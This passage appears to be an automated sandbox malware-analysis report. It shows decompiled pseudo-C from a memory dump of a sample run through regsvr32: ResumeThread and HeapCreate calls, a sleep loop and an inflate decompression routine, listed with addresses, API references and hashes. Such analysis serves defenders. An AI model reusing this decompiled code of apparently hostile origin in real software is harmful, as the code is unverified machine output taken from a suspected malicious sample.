                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ResumeThread.KERNELBASE(?,0499D8C2,?,?,00000001), ref: 0499DA5F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                              • Opcode ID: 75a49098e103fa1c17031393f3a0005be3a5d150b5cbd55ef2c3925aac285e56
                                                                                                                                                                                              • Instruction ID: 439396fd2095605561d913397462dd1d35d410acffc46cfa9ac6dc3f42972456
                                                                                                                                                                                              • Opcode Fuzzy Hash: 75a49098e103fa1c17031393f3a0005be3a5d150b5cbd55ef2c3925aac285e56
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EB092322A40019BCB004B78E80B9907BE0FB56706798C2F0E006C6061C32EC8968A80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04998BC9 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04998BC9() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x49af900 = _t1;
				return _t1;
			}




                                                                                                                                                                                              0x04998bd2
                                                                                                                                                                                              0x04998bd8
                                                                                                                                                                                              0x04998bdd

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00096000,00000000,04996502), ref: 04998BD2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                                              • Opcode ID: d080d9951718d0360c5c678aa660708db28792eb448fcf3883659ab62c825178
                                                                                                                                                                                              • Instruction ID: fd5d2db58413331ca71e5e1db41af497111eab09cd2e5b39fccd1845e4c2a9dd
                                                                                                                                                                                              • Opcode Fuzzy Hash: d080d9951718d0360c5c678aa660708db28792eb448fcf3883659ab62c825178
                                                                                                                                                                                              • Instruction Fuzzy Hash: F1B012B0B8A30066D6104B105C06B013D10FBC0B42F104020F6069C1C4D7A424209544
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499DA6D Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                              			E0499DA6D(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E0499A0A3(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}









                                                                                                                                                                                              0x0499da70
                                                                                                                                                                                              0x0499da71
                                                                                                                                                                                              0x0499da74
                                                                                                                                                                                              0x0499da77
                                                                                                                                                                                              0x0499da7c
                                                                                                                                                                                              0x0499da7f
                                                                                                                                                                                              0x0499da82
                                                                                                                                                                                              0x0499da82
                                                                                                                                                                                              0x0499da8a
                                                                                                                                                                                              0x0499da8f
                                                                                                                                                                                              0x0499da92
                                                                                                                                                                                              0x0499da95
                                                                                                                                                                                              0x0499da98
                                                                                                                                                                                              0x0499da9b
                                                                                                                                                                                              0x0499daae
                                                                                                                                                                                              0x0499daaf
                                                                                                                                                                                              0x0499dab2
                                                                                                                                                                                              0x0499dab8
                                                                                                                                                                                              0x0499dabb
                                                                                                                                                                                              0x0499dabe
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499dac0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499dabe
                                                                                                                                                                                              0x0499dac4
                                                                                                                                                                                              0x0499dac4
                                                                                                                                                                                              0x0499dac6
                                                                                                                                                                                              0x0499dac6
                                                                                                                                                                                              0x0499dac9
                                                                                                                                                                                              0x0499dac9
                                                                                                                                                                                              0x0499dace
                                                                                                                                                                                              0x0499dad6
                                                                                                                                                                                              0x0499dae2

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNELBASE(0000000A), ref: 0499DAD6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                              • Opcode ID: 0946fa263caa7eba7e467d36437ddea1a0d71590a5b3681714ea801011abad7f
                                                                                                                                                                                              • Instruction ID: 7570e079495c26d6bd613f54822ae2a317f38ffbd2211b41225c0163b818fcc4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0946fa263caa7eba7e467d36437ddea1a0d71590a5b3681714ea801011abad7f
                                                                                                                                                                                              • Instruction Fuzzy Hash: CD111771A05205AFEF14CFA9C5C5AA9B7E8EF88324F148979E85A9B300D375FE50CB40
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Function 049A670F Relevance: 8.1, Strings: 6, Instructions: 577COMMONCrypto
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                                                              			E049A670F(void* __edi) {
				signed int _t164;
				unsigned int _t172;
				unsigned int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t182;
				signed int _t184;
				unsigned int _t185;
				int _t186;
				int _t194;
				signed char _t200;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				int _t210;
				int _t222;
				signed int _t227;
				signed int _t235;
				signed int _t251;
				signed char _t252;
				unsigned int _t253;
				signed char _t254;
				signed int* _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t266;
				intOrPtr _t271;
				signed char _t278;
				signed int _t279;
				char* _t280;
				signed int _t282;
				signed char _t284;
				signed int _t287;
				signed int _t291;
				int _t292;
				int _t293;
				int _t296;
				int _t298;
				int _t302;
				signed int _t305;
				signed char _t311;
				signed char _t312;
				signed char _t315;
				signed char _t316;
				signed int _t318;
				int _t319;
				int _t320;
				signed char _t322;
				int _t324;
				int _t326;
				int _t330;
				signed int _t333;
				signed char _t336;
				signed char _t337;
				signed char _t339;
				int _t341;
				signed int _t347;
				int _t349;
				intOrPtr _t350;
				intOrPtr _t351;
				unsigned int _t356;
				unsigned int _t361;
				signed int _t364;
				signed int _t365;
				intOrPtr _t367;
				void* _t368;
				intOrPtr* _t380;
				void* _t381;
				intOrPtr* _t389;
				void* _t390;
				signed int _t395;
				void* _t396;
				signed int _t397;
				void* _t403;
				void* _t405;
				intOrPtr* _t412;
				void* _t413;
				signed int _t414;
				void* _t416;
				intOrPtr* _t423;
				void* _t424;
				unsigned int _t430;
				signed int _t431;
				void* _t434;
				signed int* _t435;
				void* _t439;

				 *((intOrPtr*)(__edi + 0x56))();
				asm("pushfd");
				_t435 = _t434 - 0x40;
				asm("cld");
				_t395 = _t435[0x16];
				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
				_t164 =  *_t395;
				_t435[0xb] = _t164;
				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
				_t271 =  *((intOrPtr*)(_t395 + 0x10));
				_t251 =  *(_t395 + 0xc);
				_t435[0xf] = _t251;
				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
				_t435[4] = _t271 - 0x101 + _t251;
				_t435[2] =  *(_t367 + 0x4c);
				_t435[3] =  *(_t367 + 0x50);
				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
				_t172 =  *(_t367 + 0x28);
				_t347 =  *(_t367 + 0x34);
				_t435[0xd] = _t172;
				_t435[0xc] =  *(_t367 + 0x30);
				_t435[0xe] = _t347;
				_t430 =  *(_t367 + 0x38);
				_t252 =  *(_t367 + 0x3c);
				_t396 = _t435[0xb];
				_t278 = _t435[5];
				if(_t278 > _t396) {
					L2:
					if((_t396 & 0x00000003) != 0) {
						_t396 = _t396 + 1;
						_t278 = _t252;
						_t252 = _t252 + 8;
						_t172 = 0 << _t278;
						_t430 = _t430 | _t172;
						goto L2;
					}
					goto L4;
				} else {
					_t341 = _t278 + 0xb - _t396;
					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
					_t435 =  &(_t435[6]);
					_t278 = 0;
					_t396 =  &(_t435[7]);
					_t435[5] = _t396;
					L4:
					_t368 = _t435[0xf];
					while(1) {
						_t439 =  *0x49ae040 - 2;
						if(_t439 == 0) {
							break;
						}
						if(_t439 > 0) {
							do {
								if(_t252 <= 0xf) {
									asm("lodsw");
									_t322 = _t252;
									_t252 = _t252 + 0x10;
									_t430 = _t431 | 0 << _t322;
								}
								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
								while(1) {
									_t253 = _t252 - _t173;
									_t431 = _t430 >> _t173;
									if(_t173 == 0) {
										asm("stosb");
										goto L22;
									}
									_t356 = _t173 >> 0x10;
									_t311 = _t173;
									if((_t173 & 0x00000010) == 0) {
										if((_t173 & 0x00000040) != 0) {
											L97:
											if((_t173 & 0x00000020) == 0) {
												_t280 = "invalid literal/length code";
												_t350 = 0x1a;
											} else {
												_t280 = 0;
												_t350 = 0xb;
											}
											L101:
											_t174 = _t435[0x16];
											if(_t280 != 0) {
												 *(_t174 + 0x18) = _t280;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
											goto L104;
										}
										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
										continue;
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 != 0) {
										if(_t253 < _t312) {
											asm("lodsw");
											_t339 = _t253;
											_t253 = _t253 + 0x10;
											_t431 = _t431 | 0 << _t339;
											_t312 = _t339;
										}
										_t253 = _t253 - _t312;
										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
										_t431 = _t431 >> _t312;
										_t356 = _t356 + _t235;
									}
									_t435[6] = _t356;
									if(_t253 <= 0xf) {
										asm("lodsw");
										_t337 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t337;
									}
									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
									while(1) {
										_t361 = _t200 >> 0x10;
										_t253 = _t253 - _t200;
										_t431 = _t431 >> _t200;
										_t315 = _t200;
										if((_t200 & 0x00000010) != 0) {
											break;
										}
										if((_t200 & 0x00000040) != 0) {
											L96:
											_t280 = "invalid distance code";
											_t350 = 0x1a;
											goto L101;
										}
										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
									}
									_t316 = _t315 & 0x0000000f;
									if(_t316 == 0) {
										if(_t361 != 1 || _t435[0xa] == _t368) {
											L38:
											_t435[0xb] = _t396;
											_t207 = _t368 - _t435[0xa];
											if(_t207 < _t361) {
												_t208 = _t435[0xd];
												_t318 =  ~_t207;
												_t414 = _t435[0xe];
												if(_t208 < _t361) {
													L100:
													_t396 = _t435[0xb];
													_t280 = "invalid distance too far back";
													_t350 = 0x1a;
													goto L101;
												}
												_t319 = _t318 + _t361;
												if(_t435[0xc] != 0) {
													_t209 = _t435[0xc];
													if(_t319 <= _t209) {
														_t416 = _t414 + _t209 - _t319;
														_t210 = _t435[6];
														if(_t210 > _t319) {
															_t210 = memcpy(_t368, _t416, _t319);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t319 + _t319;
															_t416 = _t368 - _t361;
														}
													} else {
														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
														_t324 = _t319 - _t209;
														_t210 = _t435[6];
														if(_t210 > _t324) {
															_t210 = memcpy(_t368, _t416, _t324);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t324 + _t324;
															_t416 = _t435[0xe];
															_t326 = _t435[0xc];
															if(_t210 > _t326) {
																_t210 = memcpy(_t368, _t416, _t326);
																_t435 =  &(_t435[3]);
																_t368 = _t416 + _t326 + _t326;
																_t416 = _t368 - _t361;
															}
														}
													}
												} else {
													_t416 = _t414 + _t208 - _t319;
													_t210 = _t435[6];
													if(_t210 > _t319) {
														_t210 = memcpy(_t368, _t416, _t319);
														_t435 =  &(_t435[3]);
														_t368 = _t416 + _t319 + _t319;
														_t416 = _t368 - _t361;
													}
												}
												_t320 = _t210;
												memcpy(_t368, _t416, _t320);
												_t435 =  &(_t435[3]);
												_t368 = _t416 + _t320 + _t320;
												_t396 = _t435[0xb];
												goto L22;
											}
											_t423 = _t368 - _t361;
											_t330 = _t435[6] - 3;
											 *_t368 =  *_t423;
											_t424 = _t423 + 3;
											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
											memcpy(_t368 + 3, _t424, _t330);
											_t435 =  &(_t435[3]);
											_t368 = _t424 + _t330 + _t330;
											_t396 = _t435[0xb];
										} else {
											_t389 = _t368 - 1;
											_t222 =  *_t389;
											_t333 = _t435[6] - 3;
											 *(_t389 + 1) = _t222;
											 *(_t389 + 2) = _t222;
											 *(_t389 + 3) = _t222;
											_t390 = _t389 + 4;
											memset(_t390, _t222, _t333 << 0);
											_t435 =  &(_t435[3]);
											_t368 = _t390 + _t333;
										}
										goto L22;
									}
									if(_t253 < _t316) {
										asm("lodsw");
										_t336 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t336;
										_t316 = _t336;
									}
									_t253 = _t253 - _t316;
									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
									_t431 = _t431 >> _t316;
									_t361 = _t361 + _t227;
									goto L38;
								}
								L22:
							} while (_t435[4] > _t368 && _t435[5] > _t396);
							L104:
							if( *0x49ae040 == 2) {
								_t253 = _t431;
							}
							_t176 = _t435[0x16];
							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
							_t282 = _t253 >> 3;
							_t397 = _t396 - _t282;
							_t254 = _t253 - (_t282 << 3);
							 *(_t176 + 0xc) = _t368;
							 *(_t351 + 0x3c) = _t254;
							_t284 = _t254;
							_t255 =  &(_t435[7]);
							if(_t435[5] == _t255) {
								_t266 =  *_t176;
								_t435[5] = _t266;
								_t397 = _t397 - _t255 + _t266;
								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
							}
							 *_t176 = _t397;
							_t258 = (1 << _t284) - 1;
							if( *0x49ae040 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t351 + 0x38) = _t431 & _t258;
							_t259 = _t435[5];
							if(_t259 <= _t397) {
								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
							} else {
								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
							}
							_t260 = _t435[4];
							if(_t260 <= _t368) {
								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
							} else {
								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
							}
							asm("popfd");
							return _t176;
						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd");
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x49ae040 = 3;
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid");
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x49ae040 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t431 = _t252;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t253 = _t435[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t431 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t396 = _t396 + 4;
							asm("psllq mm7, mm6");
							_t431 = _t431 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t173 =  *(_t253 + _t172 * 4);
						while(1) {
							_t279 = _t173 & 0x000000ff;
							asm("movd mm1, ecx");
							_t431 = _t431 - _t279;
							if(_t173 == 0) {
								break;
							}
							_t349 = _t173 >> 0x10;
							if((_t173 & 0x00000010) == 0) {
								if((_t173 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t173 =  *(_t253 + ((_t279 &  *(0x49a668c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
								continue;
							}
							_t178 = _t173 & 0x0000000f;
							if(_t178 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t431 = _t431 - _t178;
								_t349 = _t349 + (_t279 &  *(0x49a668c + _t178 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t431 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t396 = _t396 + 4;
								asm("psllq mm7, mm6");
								_t431 = _t431 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t179 =  *(_t435[3] + _t178 * 4);
							while(1) {
								_t287 = _t179 & 0x000000ff;
								_t253 = _t179 >> 0x10;
								_t431 = _t431 - _t287;
								asm("movd mm1, ecx");
								if((_t179 & 0x00000010) != 0) {
									break;
								}
								if((_t179 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t179 =  *(_t435[3] + ((_t287 &  *(0x49a668c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
							}
							_t182 = _t179 & 0x0000000f;
							if(_t182 == 0) {
								if(_t253 != 1 || _t435[0xa] == _t368) {
									L76:
									_t435[0xb] = _t396;
									_t184 = _t368 - _t435[0xa];
									if(_t184 < _t253) {
										_t185 = _t435[0xd];
										_t291 =  ~_t184;
										_t403 = _t435[0xe];
										if(_t185 < _t253) {
											goto L100;
										}
										_t292 = _t291 + _t253;
										if(_t435[0xc] != 0) {
											_t186 = _t435[0xc];
											if(_t292 <= _t186) {
												_t405 = _t403 + _t186 - _t292;
												if(_t349 > _t292) {
													_t349 = _t349 - _t292;
													memcpy(_t368, _t405, _t292);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t292 + _t292;
													_t405 = _t368 - _t253;
												}
											} else {
												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
												_t296 = _t292 - _t186;
												if(_t349 > _t296) {
													_t349 = _t349 - _t296;
													memcpy(_t368, _t405, _t296);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t296 + _t296;
													_t405 = _t435[0xe];
													_t298 = _t435[0xc];
													if(_t349 > _t298) {
														_t349 = _t349 - _t298;
														memcpy(_t368, _t405, _t298);
														_t435 =  &(_t435[3]);
														_t368 = _t405 + _t298 + _t298;
														_t405 = _t368 - _t253;
													}
												}
											}
										} else {
											_t405 = _t403 + _t185 - _t292;
											if(_t349 > _t292) {
												_t349 = _t349 - _t292;
												memcpy(_t368, _t405, _t292);
												_t435 =  &(_t435[3]);
												_t368 = _t405 + _t292 + _t292;
												_t405 = _t368 - _t253;
											}
										}
										_t293 = _t349;
										_t172 = memcpy(_t368, _t405, _t293);
										_t435 =  &(_t435[3]);
										_t368 = _t405 + _t293 + _t293;
										_t396 = _t435[0xb];
										_t253 = _t435[2];
										goto L64;
									}
									_t412 = _t368 - _t253;
									_t302 = _t349 - 3;
									 *_t368 =  *_t412;
									_t413 = _t412 + 3;
									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
									_t172 = memcpy(_t368 + 3, _t413, _t302);
									_t435 =  &(_t435[3]);
									_t368 = _t413 + _t302 + _t302;
									_t396 = _t435[0xb];
									_t253 = _t435[2];
									goto L64;
								} else {
									_t380 = _t368 - 1;
									_t194 =  *_t380;
									_t305 = _t349 - 3;
									 *(_t380 + 1) = _t194;
									 *(_t380 + 2) = _t194;
									 *(_t380 + 3) = _t194;
									_t381 = _t380 + 4;
									_t172 = memset(_t381, _t194, _t305 << 0);
									_t435 =  &(_t435[3]);
									_t368 = _t381 + _t305;
									_t253 = _t435[2];
									L64:
									if(_t435[4] <= _t368) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t431 = _t431 - _t182;
							_t253 = _t253 + (_t287 &  *(0x49a668c + _t182 * 4));
							goto L76;
						}
						_t172 = _t173 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t435[5] > _t396);
					goto L104;
				}
			}




























































































                                                                                                                                                                                              0x049a670f
                                                                                                                                                                                              0x049a6714
                                                                                                                                                                                              0x049a6715
                                                                                                                                                                                              0x049a6718
                                                                                                                                                                                              0x049a6719
                                                                                                                                                                                              0x049a671d
                                                                                                                                                                                              0x049a6723
                                                                                                                                                                                              0x049a672a
                                                                                                                                                                                              0x049a672e
                                                                                                                                                                                              0x049a6736
                                                                                                                                                                                              0x049a6739
                                                                                                                                                                                              0x049a674a
                                                                                                                                                                                              0x049a674e
                                                                                                                                                                                              0x049a6752
                                                                                                                                                                                              0x049a675c
                                                                                                                                                                                              0x049a6760
                                                                                                                                                                                              0x049a676f
                                                                                                                                                                                              0x049a677d
                                                                                                                                                                                              0x049a6781
                                                                                                                                                                                              0x049a6787
                                                                                                                                                                                              0x049a678a
                                                                                                                                                                                              0x049a678e
                                                                                                                                                                                              0x049a6792
                                                                                                                                                                                              0x049a6796
                                                                                                                                                                                              0x049a6799
                                                                                                                                                                                              0x049a679c
                                                                                                                                                                                              0x049a67a0
                                                                                                                                                                                              0x049a67a6
                                                                                                                                                                                              0x049a67ca
                                                                                                                                                                                              0x049a67d0
                                                                                                                                                                                              0x049a67d6
                                                                                                                                                                                              0x049a67d7
                                                                                                                                                                                              0x049a67d9
                                                                                                                                                                                              0x049a67dc
                                                                                                                                                                                              0x049a67de
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a67de
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a67a8
                                                                                                                                                                                              0x049a67ab
                                                                                                                                                                                              0x049a67be
                                                                                                                                                                                              0x049a67be
                                                                                                                                                                                              0x049a67be
                                                                                                                                                                                              0x049a67c0
                                                                                                                                                                                              0x049a67c4
                                                                                                                                                                                              0x049a67e2
                                                                                                                                                                                              0x049a67e2
                                                                                                                                                                                              0x049a67e6
                                                                                                                                                                                              0x049a67e6
                                                                                                                                                                                              0x049a67ed
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a67f3
                                                                                                                                                                                              0x049a6860
                                                                                                                                                                                              0x049a6863
                                                                                                                                                                                              0x049a6867
                                                                                                                                                                                              0x049a6869
                                                                                                                                                                                              0x049a686b
                                                                                                                                                                                              0x049a6870
                                                                                                                                                                                              0x049a6870
                                                                                                                                                                                              0x049a687b
                                                                                                                                                                                              0x049a687e
                                                                                                                                                                                              0x049a6880
                                                                                                                                                                                              0x049a6882
                                                                                                                                                                                              0x049a6886
                                                                                                                                                                                              0x049a688b
                                                                                                                                                                                              0x049a688b
                                                                                                                                                                                              0x049a688b
                                                                                                                                                                                              0x049a68a3
                                                                                                                                                                                              0x049a68a6
                                                                                                                                                                                              0x049a68aa
                                                                                                                                                                                              0x049a69a6
                                                                                                                                                                                              0x049a6cba
                                                                                                                                                                                              0x049a6cbc
                                                                                                                                                                                              0x049a6cca
                                                                                                                                                                                              0x049a6ccf
                                                                                                                                                                                              0x049a6cbe
                                                                                                                                                                                              0x049a6cbe
                                                                                                                                                                                              0x049a6cc3
                                                                                                                                                                                              0x049a6cc3
                                                                                                                                                                                              0x049a6ce6
                                                                                                                                                                                              0x049a6ce6
                                                                                                                                                                                              0x049a6cec
                                                                                                                                                                                              0x049a6cee
                                                                                                                                                                                              0x049a6cee
                                                                                                                                                                                              0x049a6cf4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6cf4
                                                                                                                                                                                              0x049a69bc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a69bc
                                                                                                                                                                                              0x049a68b0
                                                                                                                                                                                              0x049a68b3
                                                                                                                                                                                              0x049a68b7
                                                                                                                                                                                              0x049a68bd
                                                                                                                                                                                              0x049a68bf
                                                                                                                                                                                              0x049a68c1
                                                                                                                                                                                              0x049a68c6
                                                                                                                                                                                              0x049a68c8
                                                                                                                                                                                              0x049a68c8
                                                                                                                                                                                              0x049a68d2
                                                                                                                                                                                              0x049a68d4
                                                                                                                                                                                              0x049a68d6
                                                                                                                                                                                              0x049a68d8
                                                                                                                                                                                              0x049a68d8
                                                                                                                                                                                              0x049a68da
                                                                                                                                                                                              0x049a68e1
                                                                                                                                                                                              0x049a68e5
                                                                                                                                                                                              0x049a68e7
                                                                                                                                                                                              0x049a68e9
                                                                                                                                                                                              0x049a68ee
                                                                                                                                                                                              0x049a68ee
                                                                                                                                                                                              0x049a68fa
                                                                                                                                                                                              0x049a68fd
                                                                                                                                                                                              0x049a68ff
                                                                                                                                                                                              0x049a6904
                                                                                                                                                                                              0x049a6906
                                                                                                                                                                                              0x049a6908
                                                                                                                                                                                              0x049a690c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a69c6
                                                                                                                                                                                              0x049a6cae
                                                                                                                                                                                              0x049a6cae
                                                                                                                                                                                              0x049a6cb3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6cb3
                                                                                                                                                                                              0x049a69dc
                                                                                                                                                                                              0x049a69dc
                                                                                                                                                                                              0x049a6912
                                                                                                                                                                                              0x049a6915
                                                                                                                                                                                              0x049a697f
                                                                                                                                                                                              0x049a693e
                                                                                                                                                                                              0x049a693e
                                                                                                                                                                                              0x049a6944
                                                                                                                                                                                              0x049a694a
                                                                                                                                                                                              0x049a69e6
                                                                                                                                                                                              0x049a69ea
                                                                                                                                                                                              0x049a69ec
                                                                                                                                                                                              0x049a69f2
                                                                                                                                                                                              0x049a6cd6
                                                                                                                                                                                              0x049a6cd6
                                                                                                                                                                                              0x049a6cda
                                                                                                                                                                                              0x049a6cdf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a6cdf
                                                                                                                                                                                              0x049a69f8
                                                                                                                                                                                              0x049a69ff
                                                                                                                                                                                              0x049a6a25
                                                                                                                                                                                              0x049a6a2b
                                                                                                                                                                                              0x049a6a5b
                                                                                                                                                                                              0x049a6a5d
                                                                                                                                                                                              0x049a6a63
                                                                                                                                                                                              0x049a6a67
                                                                                                                                                                                              0x049a6a67
                                                                                                                                                                                              0x049a6a67
                                                                                                                                                                                              0x049a6a6b
                                                                                                                                                                                              0x049a6a6b
                                                                                                                                                                                              0x049a6a2d
                                                                                                                                                                                              0x049a6a33
                                                                                                                                                                                              0x049a6a35
                                                                                                                                                                                              0x049a6a37
                                                                                                                                                                                              0x049a6a3d
                                                                                                                                                                                              0x049a6a41
                                                                                                                                                                                              0x049a6a41
                                                                                                                                                                                              0x049a6a41
                                                                                                                                                                                              0x049a6a43
                                                                                                                                                                                              0x049a6a47
                                                                                                                                                                                              0x049a6a4d
                                                                                                                                                                                              0x049a6a51
